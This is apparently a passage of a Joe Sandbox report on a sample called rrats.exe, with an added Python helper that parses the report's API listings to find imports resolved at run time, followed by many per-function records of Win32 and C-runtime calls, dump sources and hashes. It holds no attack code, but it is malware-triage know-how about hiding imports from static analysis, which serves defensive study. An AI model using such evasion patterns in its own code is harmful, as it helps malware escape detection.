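The two records above show the stub resolving CryptProtectMemory and CryptUnprotectMemory from Crypt32.dll, and CorExitProcess from mscoree.dll, through LoadLibraryW / GetModuleHandleExW followed by GetProcAddress rather than through the static import table, so these targets never appear in an import-table view of the file. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses the report's bulleted "APIs" lines into records and lists the dynamically resolved (library, function, call site) triples. The line grammar it assumes (bullet, optional "Part of subcall function XXXX:", API.MODULE(args), "ref:" address) and the heuristic of taking the DLL name from any ".dll" token printed in a loader call's argument list are assumptions reconstructed from the lines on this page; the sample input is copied from the two records above plus one argument-less CRT line from an earlier record.

```python
import re
from typing import List, NamedTuple, Optional, Tuple


class ApiCall(NamedTuple):
    """One line of a Joe Sandbox per-function 'APIs' listing."""
    api: str                    # e.g. "GetProcAddress"
    module: str                 # e.g. "KERNEL32" (the report's module suffix)
    args: List[str]             # argument tokens exactly as printed (stack values, '?', literals)
    ref: str                    # call-site address, upper-case hex
    subcall_of: Optional[str]   # parent function address for "Part of subcall function" lines


# Assumed line grammar, reconstructed from the report lines on this page:
#   • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAF2E4
#   • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,...), ref: 00CB0858
#   • _wcslen.LIBCMT ref: 00CAC197          <- no argument list at all
_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
_HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

# Loader APIs that establish which DLL a later GetProcAddress resolves from.
_LOADERS = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW",
            "GetModuleHandleA", "GetModuleHandleW", "GetModuleHandleExA", "GetModuleHandleExW"}


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse every bulleted API line; lines that do not match the grammar are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             m.group("ref").upper(), m.group("parent")))
    return calls


def _symbolic(args: List[str]) -> List[str]:
    """Arguments that are neither unknown ('?') nor 8-digit hex stack values, i.e. literals."""
    return [a for a in args if a and a != "?" and not _HEX8.match(a)]


def dynamic_imports(calls: List[ApiCall]) -> List[Tuple[str, str, str]]:
    """(library, function, call_site) for each GetProcAddress, in listing order.

    Heuristic (assumption): the library is the most recent '.dll' token printed in
    a loader call's argument list, because the report prints stack contents rather
    than decoded parameters. 'unknown' when no loader preceded the resolution.
    """
    library = "unknown"
    found: List[Tuple[str, str, str]] = []
    for c in calls:
        if c.api in _LOADERS:
            dlls = [a for a in c.args if a.lower().endswith(".dll")]
            if dlls:
                library = dlls[0]
        elif c.api == "GetProcAddress":
            names = _symbolic(c.args)
            if names:
                found.append((library, names[0], c.ref))
    return found


def subcall_parents(calls: List[ApiCall]) -> List[str]:
    """Distinct helper-function addresses the listing attributes calls to, in order."""
    seen: List[str] = []
    for c in calls:
        if c.subcall_of and c.subcall_of.upper() not in seen:
            seen.append(c.subcall_of.upper())
    return seen


# Sample input copied from this report: the Crypt32.dll and mscoree.dll records
# above, plus one argument-less CRT line from an earlier record.
SAMPLE = """\
APIs
  • Part of subcall function 00CB081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00CB0836
  • Part of subcall function 00CB081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00CAF2D8,Crypt32.dll,00000000,00CAF35C,?,?,00CAF33E,?,?,?), ref: 00CB0858
• GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 00CAF2E4
• GetProcAddress.KERNEL32(00CE81C8,CryptUnprotectMemory), ref: 00CAF2F4
APIs
• GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00CC7E24,?,?,00CC7DC4,?,00CDC300,0000000C,00CC7F1B,?,00000002), ref: 00CC7E93
• GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CC7EA6
• FreeLibrary.KERNEL32(00000000,?,?,?,00CC7E24,?,?,00CC7DC4,?,00CDC300,0000000C,00CC7F1B,?,00000002,00000000), ref: 00CC7EC9
• _wcslen.LIBCMT ref: 00CAC197
"""

if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for lib, fn, site in dynamic_imports(parsed):
        print(f"{site}: {lib} -> {fn}")
```

Run against a whole report, the output is a short list of run-time-resolved imports to compare with the static import table; for this sample it yields the two DPAPI memory-protection routines from Crypt32.dll and the CLR shutdown hook CorExitProcess from mscoree.dll. The DLL-name heuristic is only as good as the stack values the report happens to print, so a resolution with "unknown" as the library should be checked by hand.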
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: AdjustPointer$_abort
                                                              • String ID:
                                                              • API String ID: 2252061734-0
                                                              • Opcode ID: 36f50f7580eb2a7f84101a060b748183aa8a899630c01de5ffd0478a18021cd1
                                                              • Instruction ID: 77b8e03d1baa0dae9727ea2e62b0f9c5191eb5af56ca597b3f63b58f614f12e1
                                                              • Opcode Fuzzy Hash: 36f50f7580eb2a7f84101a060b748183aa8a899630c01de5ffd0478a18021cd1
                                                              • Instruction Fuzzy Hash: 1851C171600212AFEB298F14D845FBAB7B4FF64710F24452EEC16876A1D731EE81E790
                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00CCBF39
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00CCBF5C
                                                                • Part of subcall function 00CC8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CC4286,?,0000015D,?,?,?,?,00CC5762,000000FF,00000000,?,?), ref: 00CC8E38
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00CCBF82
                                                              • _free.LIBCMT ref: 00CCBF95
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CCBFA4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                              • String ID:
                                                              • API String ID: 336800556-0
                                                              • Opcode ID: f81ba7c967710e0ed18ee8beeb3009a3ed2a8c41340fdf2c1d660bbf5159db8b
                                                              • Instruction ID: 3a83af7ce3042abd76038bbabfae662f65e83949e84a153370c5a0c65a306d11
                                                              • Opcode Fuzzy Hash: f81ba7c967710e0ed18ee8beeb3009a3ed2a8c41340fdf2c1d660bbf5159db8b
                                                              • Instruction Fuzzy Hash: 3301D87AA022127F232116FA9C4EF7F6B6DDEC2B61714011EF904C2200EF608D0195B1
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00CC91AD,00CCB188,?,00CC9813,00000001,00000364,?,00CC40EF,?,?,00CE1098), ref: 00CC986E
                                                              • _free.LIBCMT ref: 00CC98A3
                                                              • _free.LIBCMT ref: 00CC98CA
                                                              • SetLastError.KERNEL32(00000000,?,00CE1098), ref: 00CC98D7
                                                              • SetLastError.KERNEL32(00000000,?,00CE1098), ref: 00CC98E0
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$_free
                                                              • String ID:
                                                              • API String ID: 3170660625-0
                                                              • Opcode ID: f6cc1fa2b6778f19fa2df099bf66aa9654f3e66e590224dc3dfd053d9461df16
                                                              • Instruction ID: 2662498e36d09c1808ef2d8d77581b6db7878228efaf491d919b3d110a581d1d
                                                              • Opcode Fuzzy Hash: f6cc1fa2b6778f19fa2df099bf66aa9654f3e66e590224dc3dfd053d9461df16
                                                              • Instruction Fuzzy Hash: FB01D1361466026BC2126369EC8DF2F2669DBD2770B21013EF525971E2EE348E05A265
                                                              APIs
                                                                • Part of subcall function 00CB11CF: ResetEvent.KERNEL32(?), ref: 00CB11E1
                                                                • Part of subcall function 00CB11CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 00CB11F5
                                                              • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00CB0F21
                                                              • CloseHandle.KERNEL32(?,?), ref: 00CB0F3B
                                                              • DeleteCriticalSection.KERNEL32(?), ref: 00CB0F54
                                                              • CloseHandle.KERNEL32(?), ref: 00CB0F60
                                                              • CloseHandle.KERNEL32(?), ref: 00CB0F6C
                                                                • Part of subcall function 00CB0FE4: WaitForSingleObject.KERNEL32(?,000000FF,00CB1101,?,?,00CB117F,?,?,?,?,?,00CB1169), ref: 00CB0FEA
                                                                • Part of subcall function 00CB0FE4: GetLastError.KERNEL32(?,?,00CB117F,?,?,?,?,?,00CB1169), ref: 00CB0FF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                               • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                              • String ID:
                                                              • API String ID: 1868215902-0
                                                              • Opcode ID: d1e31baf1df69b087d1612787caf9c437405a7677064bf9eeb6250611bd62428
                                                              • Instruction ID: 3e46236e75f5b444c271fd2d9f4df6e5fcf6bf122817922fe5f6cf1402ac45c4
                                                              • Opcode Fuzzy Hash: d1e31baf1df69b087d1612787caf9c437405a7677064bf9eeb6250611bd62428
                                                              • Instruction Fuzzy Hash: 8D017172501784EFC7229B64DC84BCAFBA9FB08710F10092EF26B92160CB757A45DB54
                                                              APIs
                                                              • _free.LIBCMT ref: 00CCC817
                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                              • _free.LIBCMT ref: 00CCC829
                                                              • _free.LIBCMT ref: 00CCC83B
                                                              • _free.LIBCMT ref: 00CCC84D
                                                              • _free.LIBCMT ref: 00CCC85F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: b6f4c9139a27ecfc9b845ae5055163ff170a773b6b67a5a9c24462b3c2a6f084
                                                              • Instruction ID: d4256cc0cd3751cb87cc4cc0ae74544b5621e2d75f5be9096a5f0f594c33a364
                                                              • Opcode Fuzzy Hash: b6f4c9139a27ecfc9b845ae5055163ff170a773b6b67a5a9c24462b3c2a6f084
                                                              • Instruction Fuzzy Hash: CBF01D32905211ABC720EB68F8C6F1B73E9AA00714765181EF11DDB9D2CB70FD80DB64
                                                              APIs
                                                              • _wcslen.LIBCMT ref: 00CB1FE5
                                                              • _wcslen.LIBCMT ref: 00CB1FF6
                                                              • _wcslen.LIBCMT ref: 00CB2006
                                                              • _wcslen.LIBCMT ref: 00CB2014
                                                              • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,00CAB371,?,?,00000000,?,?,?), ref: 00CB202F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _wcslen$CompareString
                                                              • String ID:
                                                              • API String ID: 3397213944-0
                                                              • Opcode ID: 36cd688e7588aeab25b5528f9426693eebd6b0a3a9d04e9ba8da288f3fe00051
                                                              • Instruction ID: 149d326dd2253b2c6aba1ed4a8a97a0384ea746fb3a487cad80c6e6fcf056488
                                                              • Opcode Fuzzy Hash: 36cd688e7588aeab25b5528f9426693eebd6b0a3a9d04e9ba8da288f3fe00051
                                                              • Instruction Fuzzy Hash: F9F01D32008058BBCF226F51FC09ECE7F26EB44760F11C41AF61A9B062CB729661E790
                                                              APIs
                                                              • _free.LIBCMT ref: 00CC891E
                                                                • Part of subcall function 00CC8DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?), ref: 00CC8DE2
                                                                • Part of subcall function 00CC8DCC: GetLastError.KERNEL32(?,?,00CCC896,?,00000000,?,00000000,?,00CCC8BD,?,00000007,?,?,00CCCCBA,?,?), ref: 00CC8DF4
                                                              • _free.LIBCMT ref: 00CC8930
                                                              • _free.LIBCMT ref: 00CC8943
                                                              • _free.LIBCMT ref: 00CC8954
                                                              • _free.LIBCMT ref: 00CC8965
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 71a481b79f49b5145e4a322f4c5a7bb1662e42cceb923f66078ccf27d15b08b0
                                                              • Instruction ID: 06d4b425d8ba2133287e5dbe975a36993440e63ea6eedb464d8d67d1c2af345a
                                                              • Opcode Fuzzy Hash: 71a481b79f49b5145e4a322f4c5a7bb1662e42cceb923f66078ccf27d15b08b0
                                                              • Instruction Fuzzy Hash: 03F01775C136238BC6067F28FC06B2A3BA1F724720342050AF119967B1CB324949ABA5
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _swprintf
                                                              • String ID: %ls$%s: %s
                                                              • API String ID: 589789837-2259941744
                                                              • Opcode ID: 3f9a54ec706e61dbfe049b0fa2042a74e79abf30e91a59830b9a530e7c5afee6
                                                              • Instruction ID: 4e9a906eb6e86c4aa395811116793f17ef392ae75f239cd6c1490cd396be7a31
                                                              • Opcode Fuzzy Hash: 3f9a54ec706e61dbfe049b0fa2042a74e79abf30e91a59830b9a530e7c5afee6
                                                              • Instruction Fuzzy Hash: 81513931288304F6E6211A918C66FF67365FB16B04FAC4916FFA6750E1C9B3A910B71A
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\rrats.exe,00000104), ref: 00CC7FAE
                                                              • _free.LIBCMT ref: 00CC8079
                                                              • _free.LIBCMT ref: 00CC8083
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: _free$FileModuleName
                                                              • String ID: C:\Users\user\Desktop\rrats.exe
                                                              • API String ID: 2506810119-1722972100
                                                              • Opcode ID: 4ad397ba5eddaba49315c695020a5fb5e4d87732f4b3870655ea60cdf9cc68d4
                                                              • Instruction ID: 7c719b0d90232c20a0a342ea9950f296ab623e23a7428ee04fa5c129e937f93a
                                                              • Opcode Fuzzy Hash: 4ad397ba5eddaba49315c695020a5fb5e4d87732f4b3870655ea60cdf9cc68d4
                                                              • Instruction Fuzzy Hash: CB318F71A00218AFDB21DF99D885FAFBBB8EB85310F10416EF51897211DB718E49DB61
                                                              APIs
                                                              • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00CC31FB
                                                              • _abort.LIBCMT ref: 00CC3306
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: EncodePointer_abort
                                                              • String ID: MOC$RCC
                                                              • API String ID: 948111806-2084237596
                                                              • Opcode ID: bbf523ad8996d4fe7ff2565f52b1983d9bc6023f902bbc88c963b2f9a4403146
                                                              • Instruction ID: 9f9a71642d10421343a15911a4a03655eb7c39fbb4de31f2c4ad2f33bc881ee9
                                                              • Opcode Fuzzy Hash: bbf523ad8996d4fe7ff2565f52b1983d9bc6023f902bbc88c963b2f9a4403146
                                                              • Instruction Fuzzy Hash: 64415672900289AFCF15DF98DC81FEEBBB5BF08304F188059F915A7262D335AA51DB90
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00CA7406
                                                                • Part of subcall function 00CA3BBA: __EH_prolog.LIBCMT ref: 00CA3BBF
                                                              • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00CA74CD
                                                                • Part of subcall function 00CA7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CA7AAB
                                                                • Part of subcall function 00CA7A9C: GetLastError.KERNEL32 ref: 00CA7AF1
                                                                • Part of subcall function 00CA7A9C: CloseHandle.KERNEL32(?), ref: 00CA7B00
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                              • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                              • API String ID: 3813983858-639343689
                                                              • Opcode ID: f6fc30482c65b125f74af4b1eb3d24baee7f595ebc4c30b574322216c4af6772
                                                              • Instruction ID: 18feaabfaf4649f9179b5a63a2102a57ca59cf2a9b9de2239898d14c6fa22a68
                                                              • Opcode Fuzzy Hash: f6fc30482c65b125f74af4b1eb3d24baee7f595ebc4c30b574322216c4af6772
                                                              • Instruction Fuzzy Hash: D831B2B1D0429AAEDF11EBA4DC45BEE7BA9BF0A308F044116F815A7282C7748B44DB61
                                                              APIs
                                                                • Part of subcall function 00CA1316: GetDlgItem.USER32(00000000,00003021), ref: 00CA135A
                                                                • Part of subcall function 00CA1316: SetWindowTextW.USER32(00000000,00CD35F4), ref: 00CA1370
                                                              • EndDialog.USER32(?,00000001), ref: 00CBAD98
                                                              • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00CBADAD
                                                              • SetDlgItemTextW.USER32(?,00000066,?), ref: 00CBADC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
                                                              Similarity
                                                              • API ID: ItemText$DialogWindow
                                                              • String ID: ASKNEXTVOL
                                                              • API String ID: 445417207-3402441367
                                                              • Opcode ID: c1705f817c5b065e75f76dece096c470d4d8049d1f19e3bac4f77972a1614bde
                                                              • Instruction ID: 680eefd3f54c42575355d2a13b01450a714dba3d5cac71e47a408d08e7a74c2f
                                                              • Opcode Fuzzy Hash: c1705f817c5b065e75f76dece096c470d4d8049d1f19e3bac4f77972a1614bde
                                                              • Instruction Fuzzy Hash: B5118E32240200BFE7119FB9DC45FEA7B6DAB4A742F400510F285EB6A0C762AA159736
                                                              APIs
                                                              • __fprintf_l.LIBCMT ref: 00CAD954
                                                              • _strncpy.LIBCMT ref: 00CAD99A
                                                                • Part of subcall function 00CB1DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,00CE1030,?,00CAD928,00000000,?,00000050,00CE1030), ref: 00CB1DC4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2050091952.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true
                                                              • Associated: 00000000.00000002.2050035565.0000000000CA0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050128084.0000000000CD3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CDE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000CE5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050254080.0000000000D02000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2050522240.0000000000D03000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ca0000_rrats.jbxd
